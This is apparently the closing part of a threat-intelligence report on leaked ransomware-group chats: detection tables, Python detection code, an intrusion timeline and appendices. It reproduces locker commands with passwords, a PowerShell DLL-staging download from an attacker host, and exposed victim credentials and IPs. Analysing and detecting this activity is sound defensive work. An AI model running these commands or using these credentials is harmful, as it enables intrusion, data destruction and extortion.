| 133148 | 2026-01-22 | mAst3r | locker --password wbwNZteb --path E:\ --system --superfast --keep |
| 133148 | 2026-01-22 | Wick | ash-4.4# /opt/updateamd --password wbwNZteb --path "/volume1/DATA/pathtofolders" --ultrafast --keep (NAS variant) |
| 133148 | 2026-01-22 | mAst3r | /opt/updateamd → “No such file or directory” → corrected to /opt/update |
| 133148 | 2026-01-22 | Wick | Per-folder execution: /opt/update --password wbwNZteb --path "/volume1/DATA/MARKETING/folder1" --ultrafast --keep (repeated per subfolder) |
| 843543 | 2026-03-15 | zeta88 | locker.exe --password 3kVOuyhF --full --ultrafast |
Note: Two different locker passwords observed: wbwNZteb (room 133148, January) and 3kVOuyhF (room 843543, March). The Windows variant is locker.exe/locker, the Linux/NAS variant is /opt/updateamd or /opt/update. Flags include --superfast, --ultrafast, --full, --system, --keep.
17. Detection Rules and Hunting Queries for Post-Exploitation
17.1 Process and Command Line Detection
Monitor for known post-exploitation frameworks, unusual argument patterns, and cleanup commands.
| Detection Vector | Rule / Indicator |
|---|---|
| Framework Execution | Process creation where process_name matches nxc.exe, crackmapexec.exe, or netexec.exe |
| Remote Command Injection | Command line contains mkdir C:\\Windows\\Temp\\ followed by a short alphanumeric string |
| Artifact Cleanup | Command line contains rd /s /q C:\\Windows\\Temp\\ |
| Custom Payload Execution | Process XenAllPasswordPro.exe or similar named PE executed with arguments -a and -r |
| PowerShell Host Anomaly | powershell.exe or pwsh.exe spawning cmd.exe with -c or /c flag to execute remote commands |
17.2 PowerShell and Scripting Detection
Focus on inline downloads, array-based file staging, and unusual script block structures.
| Detection Vector | Rule / Indicator |
|---|---|
| Web Download Activity | PowerShell command contains Invoke-WebRequest or iwr with -OutFile targeting C:\\Windows\\Temp\\ |
| Multi-File Staging | Script block contains an array @("file1","file2",...) or ForEach-Object iterating over HTTP URLs |
| DLL Dependency Download | URLs or filenames contain api-ms-win-crt-*.dll, vcruntime140.dll, nss3.dll, libcrypto-3.dll, or mozglue.dll |
| Encoded/Inline Execution | powershell -enc, IEX, Invoke-Expression, or cmd /c powershell -c used to bypass policy logging |
| Script Block Logging (Event ID 4104) | Text contains Split-Path $_ -Leaf, iwr, or .html output redirection in the same block |
17.3 Network and HTTP/HTTPS Traffic Detection
Track outbound staging, non-standard ports, and bulk HTTP requests from workstation endpoints.
| Detection Vector | Rule / Indicator |
|---|---|
| Non-Standard HTTP Port | Outbound HTTP/HTTPS to destination port 8887 from a non-proxy client |
| Bulk DLL Download | Single source IP initiates 10+ concurrent or sequential HTTP GET requests to the same directory within a short timeframe |
| Unusual User-Agent | HTTP request User-Agent matches PowerShell (Microsoft.Http, Mozilla/5.0 (Windows NT...)) instead of a browser or update client |
| HTTP to Localhost/Link-Local | Requests to http://10.10.16.249:8887/ or other link-local/private IPs on non-standard ports |
| Exfiltration Pattern | Subsequent HTTP POST or SMB file access targeting a newly generated .html report in C:\\Windows\\Temp\\ |
17.4 File System and Artifact Detection
Monitor for suspicious staging folders, unexpected DLL placements, and report generation.
| Detection Vector | Rule / Indicator |
|---|---|
| Random Temp Directory | Directory created in C:\\Windows\\Temp\\ with a 6-8 character random alphanumeric name (e.g., BdDfelT) |
| Staging DLLs | Multiple *.dll files with Mozilla NSS/OpenSSL/MSVC naming conventions dropped into C:\\Windows\\Temp\\ |
| HTML Report Generation | New .html file created in C:\\Windows\\Temp\\ with a filename matching the endpoint's IP address or hostname |
| Sudden File Deletion | Rapid creation followed by rd /s /q or Remove-Item -Recurse of the same directory within 2-5 minutes |
| File Access via SMB | Admin$ or IPC$ share access followed by bulk file read operations targeting C:\\Windows\\Temp\\ contents |
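The rules in 17.1, 17.2 and 17.4 expressed as runnable detection logic, added here as an example for this report; it is not code from the leak and not the tooling in the Ransom-ISAC repository. It models endpoint events in a Sysmon/Event ID 4104-like shape and runs them over a constructed event sequence (staging directory, DLL download script, report generation, cleanup) that mirrors the indicators in the tables. The field names, the five-minute deletion window, the sample host name and the sample events are assumptions; the `BdDfelT` directory name and the `10.10.16.249:8887` address are the ones quoted in the tables.

```python
"""Detection logic for the endpoint indicators in sections 17.1, 17.2 and 17.4.
Added example for this report, not tooling from the leak or the Ransom-ISAC repository.
Events are modelled on Sysmon process/file events and PowerShell 4104 script blocks;
field names, thresholds and all sample data below are constructed assumptions."""
import re
from collections import namedtuple
from datetime import datetime, timedelta

FRAMEWORK_IMAGES = {"nxc.exe", "crackmapexec.exe", "netexec.exe"}
TEMP = r"c:\\windows\\temp\\"                                        # regex for C:\Windows\Temp\
RANDOM_DIR = re.compile(r"^" + TEMP + r"([a-z0-9]{6,8})\\?$", re.I)  # 6-8 char random staging dir
DIR_IN_CMD = re.compile(TEMP + r"([a-z0-9]{6,8})\b", re.I)
REMOTE_MKDIR = re.compile(r"\bmkdir\s+" + TEMP + r"[a-z0-9]{6,8}\b", re.I)
CLEANUP = re.compile(r"\b(rd|rmdir)\s+/s\s+/q\s+" + TEMP + r"|remove-item\b.*-recurse", re.I)
TEMP_DOWNLOAD = re.compile(r"\b(invoke-webrequest|iwr)\b.*-outfile\s+[\"']?" + TEMP, re.I)
INLINE_EXEC = re.compile(r"\s-enc(odedcommand)?\s|\biex\b|invoke-expression", re.I)
ARRAY_STAGING = re.compile(r'@\(\s*"[^"]+"(\s*,\s*"[^"]+")+\s*\)|foreach-object.*https?://', re.I)
RUNTIME_DLL = re.compile(r"\b(api-ms-win-crt-[\w-]+|vcruntime140|nss3|libcrypto-3|mozglue)\.dll\b", re.I)
HTML_REPORT = re.compile(r"^" + TEMP + r"(?:[^\\]+\\)*(\d{1,3}(?:\.\d{1,3}){3}|[a-z0-9-]+)\.html$", re.I)
BLOCK_MARKERS = (r"split-path\s+\$_\s+-leaf", r"\biwr\b", r">\s*\S*\.html\b")  # 17.2 Event ID 4104 rule
PROCESS_RULES = [(REMOTE_MKDIR, "17.1 remote command injection (mkdir staging dir)"),
                 (TEMP_DOWNLOAD, "17.2 web download to temp"),
                 (INLINE_EXEC, "17.2 encoded/inline execution"), (CLEANUP, "17.1 artifact cleanup")]
SCRIPT_RULES = [(TEMP_DOWNLOAD, "17.2 web download to temp"), (ARRAY_STAGING, "17.2 multi-file staging"),
                (RUNTIME_DLL, "17.2 dll dependency download"), (INLINE_EXEC, "17.2 encoded/inline execution")]

# kind is "process", "script_block" or "file_create"; every other field defaults to ""
Event = namedtuple("Event", "kind ts host image parent_image command_line script_text target_filename",
                   defaults=[""] * 6)
def _base(path): return path.rsplit("\\", 1)[-1].lower()

class EndpointDetector:
    DELETE_WINDOW = timedelta(minutes=5)   # 17.4: staging dir removed within minutes of creation

    def __init__(self):
        self._staging = {}                 # lowercased staging dir name -> first-seen time

    def process(self, ev):
        img, parent, cl = _base(ev.image), _base(ev.parent_image), ev.command_line
        hits = ["17.1 framework execution"] if img in FRAMEWORK_IMAGES else []
        if img.startswith("xenallpassword") and re.search(r"\s-a\b", cl) and re.search(r"\s-r\b", cl):
            hits.append("17.1 custom payload execution")
        if parent in {"powershell.exe", "pwsh.exe"} and img == "cmd.exe" and re.search(r"\s[-/]c\b", cl):
            hits.append("17.1 powershell host anomaly")
        hits += [name for rx, name in PROCESS_RULES if rx.search(cl)]
        d = DIR_IN_CMD.search(cl)          # staging directory named on the command line, if any
        if d and REMOTE_MKDIR.search(cl):
            self._staging.setdefault(d.group(1).lower(), ev.ts)
        elif d and CLEANUP.search(cl):
            created = self._staging.get(d.group(1).lower())
            if created is not None and timedelta(0) <= ev.ts - created <= self.DELETE_WINDOW:
                hits.append("17.4 sudden file deletion")
        return hits

    def script(self, ev):
        hits = [name for rx, name in SCRIPT_RULES if rx.search(ev.script_text)]
        # the 4104 rule lists three markers; require two in one block to cut noise from a lone 'iwr'
        if sum(bool(re.search(p, ev.script_text, re.I)) for p in BLOCK_MARKERS) >= 2:
            hits.append("17.2 script block staging pattern")
        return hits

    def file(self, ev):
        path, hits = ev.target_filename, []
        d = RANDOM_DIR.match(path)
        if d:
            hits.append("17.4 random temp directory")
            self._staging.setdefault(d.group(1).lower(), ev.ts)
        elif re.match(TEMP, path, re.I) and RUNTIME_DLL.search(path):
            hits.append("17.4 staging dll")
        h = HTML_REPORT.match(path)        # report named after the endpoint's IP or hostname
        if h and (h.group(1).count(".") == 3 or h.group(1).lower() == ev.host.lower()):
            hits.append("17.4 html report generation")
        return hits

def run_detections(events):
    """Per event, in input order, the rule names that fired (state carries across events)."""
    det = EndpointDetector()
    handlers = {"process": det.process, "script_block": det.script, "file_create": det.file}
    return [handlers.get(ev.kind, lambda e: [])(ev) for ev in events]

# --- constructed sample telemetry mirroring the indicators in the tables ---------------
T0, HOST, SYS = datetime(2026, 1, 25, 9, 0, 0), "WS-FIN-07", "C:\\Windows\\System32\\"
SAMPLE_SCRIPT = ('$files = @("nss3.dll","mozglue.dll","vcruntime140.dll")\n'
                 '$files | ForEach-Object { iwr "http://10.10.16.249:8887/$_" '
                 '-OutFile "C:\\Windows\\Temp\\BdDfelT\\$(Split-Path $_ -Leaf)" }')
def _p(sec, image, parent, cl): return Event("process", T0 + timedelta(seconds=sec), HOST, image, parent, cl)
def _f(sec, path): return Event("file_create", T0 + timedelta(seconds=sec), HOST, target_filename=path)
SAMPLE_EVENTS = [
    _p(0, SYS + "cmd.exe", SYS + "svchost.exe", r"cmd.exe /Q /c mkdir C:\Windows\Temp\BdDfelT"),
    _f(1, r"C:\Windows\Temp\BdDfelT"),
    Event("script_block", T0 + timedelta(seconds=5), HOST, script_text=SAMPLE_SCRIPT),
    _f(10, r"C:\Windows\Temp\BdDfelT\nss3.dll"),
    _p(20, r"C:\Windows\Temp\BdDfelT\XenAllPasswordPro.exe", SYS + "cmd.exe",
       r'XenAllPasswordPro.exe -a -r "C:\Windows\Temp\BdDfelT\WS-FIN-07.html"'),
    _f(25, r"C:\Windows\Temp\BdDfelT\WS-FIN-07.html"),
    _p(90, SYS + "cmd.exe", SYS + "svchost.exe", r"cmd.exe /Q /c rd /s /q C:\Windows\Temp\BdDfelT"),
    _p(100, SYS + "cmd.exe", SYS + "WindowsPowerShell\\v1.0\\powershell.exe", "cmd.exe /c whoami /all"),
    _p(120, SYS + "svchost.exe", SYS + "services.exe", "svchost.exe -k netsvcs -p -s wuauserv"),  # benign
]
```

`run_detections` returns one list of fired rule names per event. The only stateful rule is the 17.4 sudden-deletion correlation, which needs the creation event (the `mkdir` command line or the directory-create event) to have been seen first, so feed events in time order. The Event ID 4104 rule fires on two of its three markers rather than on a lone `iwr`, which keeps ordinary download scripts out of the queue; loosen it to one marker if you prefer to triage every `iwr` by hand.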
17.5 SMB and Lateral Movement Detection
Detect remote command execution and file transfer patterns consistent with automated tools.
| Detection Vector | Rule / Indicator |
|---|---|
| SMB Remote Execution | Event ID 5140/5145 (Windows) or EDR lateral movement indicator with cmd.exe or powershell.exe invoked via SMB pipe |
| DCOM/WinRM Correlation | SMB execution accompanied by DCOM (DCOMLaunch, wmiprvse.exe) or WinRM (svchost.exe -k netsvcs) spawning child processes |
| Anonymous/Default Share Abuse | Access to ADMIN$, IPC$, or C$ from a non-admin account or unexpected source IP |
| Credential Replay Pattern | Multiple IPs in rapid succession authenticated with the same domain account over SMB within minutes |
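The 17.3 and 17.5 indicators are correlations over time rather than single-event matches, so they are shown here as sliding-window logic over constructed proxy-log lines and Event ID 5145-style share-access records. This is an added example for this report, not code from the leak or from the Ransom-ISAC repository. The proxy-log line format, the proxy egress and jump-host addresses, the thresholds (10 GETs in two minutes, three hosts in five minutes) and all sample records are assumptions; the port `8887`, the `10.10.16.249` host and the DLL names are the ones quoted in the tables.

```python
"""Correlations for the network (17.3) and SMB/lateral-movement (17.5) indicators.
Added example for this report, not tooling from the leak or the Ransom-ISAC repository.
The proxy-log line format, the 5145-style share-access records, the proxy and jump-host
addresses, the thresholds and all sample data below are constructed assumptions."""
import re
import shlex
from collections import Counter, defaultdict, deque, namedtuple
from datetime import datetime, timedelta, timezone
from ipaddress import ip_address

SUSPECT_PORTS = {8887}                              # non-standard HTTP port named in the report
STANDARD_WEB_PORTS = {80, 443, 8080, 8443}
PROXY_EGRESS = {"10.10.1.5"}                        # assumed corporate proxy address (constructed)
JUMP_HOSTS = {"10.10.1.50"}                         # assumed admin jump host (constructed)
ADMIN_SHARES = {"ADMIN$", "IPC$", "C$"}
PS_UA = re.compile(r"powershell|microsoft\.http", re.I)  # browsers share the Mozilla/5.0 prefix; key on these
BULK_N, BULK_WINDOW = 10, timedelta(minutes=2)      # 17.3: 10+ GETs to one server directory
REPLAY_N, REPLAY_WINDOW = 3, timedelta(minutes=5)   # 17.5: one account, many hosts, a few minutes

Alert = namedtuple("Alert", "ts src rule detail")
HttpReq = namedtuple("HttpReq", "ts src dst port method path ua")
ShareAccess = namedtuple("ShareAccess", "ts account src host share")   # Event ID 5145-like fields

def parse_http_line(line):
    """Constructed proxy-log format: <iso-ts> <src> <dst:port> <method> <path> "<user-agent>"."""
    ts, src, dst_port, method, path, ua = shlex.split(line)
    dst, port = dst_port.rsplit(":", 1)
    return HttpReq(datetime.fromisoformat(ts.replace("Z", "+00:00")), src, dst, int(port), method, path, ua)

def http_alerts(reqs):
    """Per-request checks plus a sliding-window count of GETs per (client, server, directory)."""
    alerts, recent, fired = [], defaultdict(deque), set()
    for r in sorted(reqs, key=lambda r: r.ts):
        where = f"{r.src} -> {r.dst}:{r.port}{r.path}"
        if r.port in SUSPECT_PORTS and r.src not in PROXY_EGRESS:
            alerts.append(Alert(r.ts, r.src, "17.3 non-standard http port", where))
        if ip_address(r.dst).is_private and r.port not in STANDARD_WEB_PORTS:
            alerts.append(Alert(r.ts, r.src, "17.3 http to private ip on non-standard port", where))
        if PS_UA.search(r.ua):
            alerts.append(Alert(r.ts, r.src, "17.3 powershell user-agent", r.ua))
        if r.method.upper() != "GET":
            continue
        key = (r.src, r.dst, r.path.rsplit("/", 1)[0])
        q = recent[key]
        q.append(r.ts)
        while r.ts - q[0] > BULK_WINDOW:           # drop requests that fell out of the window
            q.popleft()
        if len(q) >= BULK_N and key not in fired:   # alert once per burst, not once per request
            fired.add(key)
            alerts.append(Alert(r.ts, r.src, "17.3 bulk download",
                                f"{len(q)} GETs to {r.dst}{key[2]}/ within {BULK_WINDOW}"))
    return alerts

def smb_alerts(events):
    """Admin-share access from outside the jump hosts, and one account fanning out to many hosts."""
    alerts, seen, fired = [], defaultdict(deque), set()
    for e in sorted(events, key=lambda e: e.ts):
        if e.share.upper() in ADMIN_SHARES and e.src not in JUMP_HOSTS:
            alerts.append(Alert(e.ts, e.src, "17.5 admin share from unexpected source",
                                f"{e.account} -> \\\\{e.host}\\{e.share}"))
        q = seen[e.account]
        q.append((e.ts, e.host))
        while e.ts - q[0][0] > REPLAY_WINDOW:
            q.popleft()
        hosts = {h for _, h in q}
        if len(hosts) >= REPLAY_N and e.account not in fired:
            fired.add(e.account)
            alerts.append(Alert(e.ts, e.src, "17.5 credential replay",
                                f"{e.account} to {sorted(hosts)} within {REPLAY_WINDOW}"))
    return alerts

def count_by_rule(alerts):
    return Counter(a.rule for a in alerts)

# --- constructed sample telemetry --------------------------------------------------------
_PS_UA = "Mozilla/5.0 (Windows NT 10.0; Microsoft Windows 10.0.19045; en-US) PowerShell/5.1.19041.1"
_DLLS = ["api-ms-win-crt-runtime-l1-1-0.dll", "api-ms-win-crt-heap-l1-1-0.dll", "api-ms-win-crt-string-l1-1-0.dll",
         "api-ms-win-crt-stdio-l1-1-0.dll", "api-ms-win-crt-convert-l1-1-0.dll", "api-ms-win-crt-math-l1-1-0.dll",
         "vcruntime140.dll", "nss3.dll", "libcrypto-3.dll", "mozglue.dll"]
SAMPLE_HTTP_LOG = [f'2026-01-25T09:00:{5 + i:02d}Z 10.10.20.15 10.10.16.249:8887 GET /BdDfelT/{d} "{_PS_UA}"'
                   for i, d in enumerate(_DLLS)] + [
    '2026-01-25T09:01:00Z 10.10.20.33 93.184.216.34:443 GET /index.html "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"',
    '2026-01-25T09:01:10Z 10.10.20.33 10.10.5.8:80 GET /wiki/Home "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0"']
_T = datetime(2026, 1, 25, 9, 2, tzinfo=timezone.utc)
SAMPLE_SHARE_EVENTS = [
    ShareAccess(_T, "CORP\\itadmin", "10.10.20.15", "FS01", "ADMIN$"),
    ShareAccess(_T + timedelta(seconds=15), "CORP\\itadmin", "10.10.20.15", "FS02", "ADMIN$"),
    ShareAccess(_T + timedelta(seconds=30), "CORP\\itadmin", "10.10.20.15", "DC01", "IPC$"),
    ShareAccess(_T + timedelta(seconds=45), "CORP\\itadmin", "10.10.20.15", "WS-FIN-07", "C$"),
    ShareAccess(_T + timedelta(minutes=1), "CORP\\backupsvc", "10.10.1.50", "FS01", "Backups$"),
    ShareAccess(_T + timedelta(minutes=2), "CORP\\helpdesk", "10.10.1.50", "WS-FIN-07", "C$"),  # jump host: allowed
]
```

`http_alerts` and `smb_alerts` each return a list of `Alert` records and `count_by_rule` rolls them up per rule; over the sample data the ten DLL fetches produce three per-request alerts each plus a single bulk-download alert, and the `itadmin` fan-out produces four admin-share alerts plus one credential-replay alert that fires at the third distinct host. The jump-host and proxy allowlists are what keep legitimate administration out of the queue; populate them from your own asset inventory before deploying anything like this.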
17.6 Detection Resources — Yara and Signature Rules
A full suite of YARA and Sigma-compatible rules is available on our GitHub page for The Gentlemen Leaks.
18. Full Operational Timeline Log (Nov 2025 – Apr 2026)
| Date | Phase | Actor(s) | Event | Room |
|---|---|---|---|---|
| 2025-11-07 | Formation | zeta88 | Initializes the channel | — |
| 2025-11-12 | Formation | zeta88, qbit, Bl0ck | Group migrates from Mattermost to Rocket.Chat. “main thing is not to let rats in” | — |
| 2025-11-17 | Formation | mAst3r | mAst3r joins | — |
| 2025-11-18 | Formation | zeta88 | First FortiGate target posted — Indian Ocean regional airport (FW-AIRMAD-IVATO) | — |
| 2025-11-25 | Formation | zeta88 | Active VPN exploitation — credential ADMINISTRATOR @llowme!n!00#, openconnect FortiGate at 14.99.248.6:10443, internal network 10.0.0.0/24 mapped | — |
| 2025-11-27 | Formation | zeta88 | First confirmed victim posted — FW-CD-MTZ-PRI (Brazilian diesel company) | 374857 |
| 2025-12-03 | Phishing Ops | mAst3r, Wick | mAst3r + Wick first contact — Islamic greeting. mAst3r starts building HTML phishing target list. Wick waiting for response from associate "hastala" | 133148 |
| 2025-12-03 | Phishing Ops | mAst3r | First phishing targets delivered — “!!!первый!!! — таргеты из нового html” (“!!!first!!! — targets from the new html”) | 133148 |
| 2025-12-05 | Phishing Ops | quant | quant comes online | — |
| 2026-01-03 | Scale Up | zeta88 | Shares ZeroPulse C2 (cloud-integrated), begins building ops panel | — |
| 2026-01-05 | Scale Up | qbit | Ready for maximum heavy work. Discusses Cisco vs FortiGate — first payout was from Cisco | 302930 |
| 2026-01-05 | Scale Up | zeta88 | Confirms 6 prior ransom payments received already | — |
| 2026-01-06 | Scale Up | qbit | Erlang SSH vulnerability (CVE-2025-32433) discussed for Cisco targeting | 302930 |
| 2026-01-07 | Scale Up | Wick | Introduces Velociraptor (signed SOC tool used as LOLBIN) | 894974 |
| 2026-01-10 | Scale Up | mAst3r | Posts target: Singapore FortiGate — “Singapore one has domain admin immediately” | 133148 |
| 2026-01-11 | Scale Up | Wick | Gains access to target — “192.168.100.3 — Domain Admin exists” | 133148 |
| 2026-01-14 | Scale Up | zeta88 | Ops panel completed — distributes access to team | — |
| 2026-01-15 | Live Intrusion | Wick, mAst3r | LIVE INTRUSION — (telco). FortiGate VPN via marcin.skotnicki (83.230.14.144:13583). CRM at 192.168.100.4, phpMyAdmin access, database exfiltrated in SQL, preparing to encrypt | 133148 |
| 2026-01-15 | Live Intrusion | quant | New access obtained — “got a batch today” | — |
| 2026-01-16 | Scale Up | zeta88 | Reveals team member was in cyber slavery in Thailand for 3000 baht — specialist in RDP | — |
| 2026-01-24 | Scale Up | Protagor | Discusses buying corporate email accounts to auto-search for VPN/password reset emails | — |
| 2026-01-30 | Ops | — | Active ops in session | 483722 |
| 2026-02-05 | Ransomware Deployment | zeta88 | Chinese NAS ransomware deployment (deadline Feb 10 set in ransom note) | 540495 |
| 2026-02-08 | Ops | zeta88 | Shares Chinese AI model list: Kimi, ERNIE, chat.z.ai, DeepSeek, Qwen | — |
| 2026-02-08 | Ransomware Deployment | — | Nashville Hospital extortion email sent — patient medical records used as leverage | — |
| 2026-02-12 | Ops | zeta88 | Shares rclone for bulk data exfiltration | — |
| 2026-03-08 | [REDACTED] Campaign | zeta88 | New channel opens — FortiGate target list sharing begins | 100256 |
| 2026-03-09 | [REDACTED] Campaign | zeta88 | Shares live FortiGate cred: 183.178.108.244:443 root gentle26 — “bruting panels is a promising direction” | 100256 |
| 2026-03-10 | Ops | Wick | Asks to use group TOX ID for ransom negotiation — zeta88 posts Gentlemen TOX ID | — |
| 2026-03-10 | Live Intrusion | — | Shipping company FortiGate intrusion (vessel-named policies: DP Sun, Min Lu, Min Rong, Shen Hai) | 662502 |
| 2026-03-12 | Ops | — | Brief active op | 251173 |
| 2026-03-14 | Live Intrusion | Wick | Using AI, frustrated. 600+ machine network targeted, ESET AV present | 133148 |
| 2026-03-17 | Live Intrusion | Wick | Large enterprise network — “printers, VMs... 600+ machines” | 133148 |
| 2026-03-25 | Ops | quant | Shares TOX ID for receiving stolen credentials | — |
| 2026-03-28 | [REDACTED] Campaign | Protagor | [REDACTED] intrusion deepens — navigating Okta MFA, VPN sessions, Jira ScriptRunner | 516533 |
| 2026-03-29 | Ransomware Deployment | — | Ransom note with TOX ID deployed to victim | 374857 |
| 2026-04-07 | Continued Ops | qbit | Shares uncensored Qwen 3.5 abliterated model (HUIHUIAI) | 302930 |
| 2026-04-08 | Continued Ops | Wick | Sets up Velociraptor on Debian for victim monitoring | — |
| 2026-04-15 | [REDACTED] Campaign | Protagor, zeta88 | Protagor navigating Okta without MFA phone. zeta88 suggests using AI to decrypt FortiGate configs | 516533 |
| 2026-04-17 | [REDACTED] Campaign | Protagor | Wants to use AI (vast.ai GPU) to analyse stolen [REDACTED] data | 516533 |
| 2026-04-21 | Continued Ops | — | New ops session opens | 750012 |
| 2026-04-22 | Continued Ops | — | Last messages in main channels | — |
| 2026-04-25 | Continued Ops | qbit | Still active — “I need to make at least 10k in 2 months” | 939364, 302930 |
| 2026-04-29 | Continued Ops | — | Latest activity in dataset | 893402, 750012 |
| 2026-04-30 | Final message | zeta88 to Kunder | zeta88's farewell: “сохрани плз всё отсюда что тебе важно — рокет удалять буду” (“Please save everything that's important to you from here—I'll delete the rocket.”) | 750012 |
Appendices
The following data files accompany this report and are available in our GitHub repository as a password-protected zip:
- Fortinet_targets.csv — 98 deduplicated FortiGate device entries
- All_links.csv — 435 URLs extracted from the corpus
- External_actors.csv — 39 external handle/brand references
- Commands_table.md — All operational commands with room/date/user attribution
This report is based exclusively on analysis of the leaked corpus. Claims by The Gentlemen operators are reproduced for intelligence purposes and are not independently verified unless stated.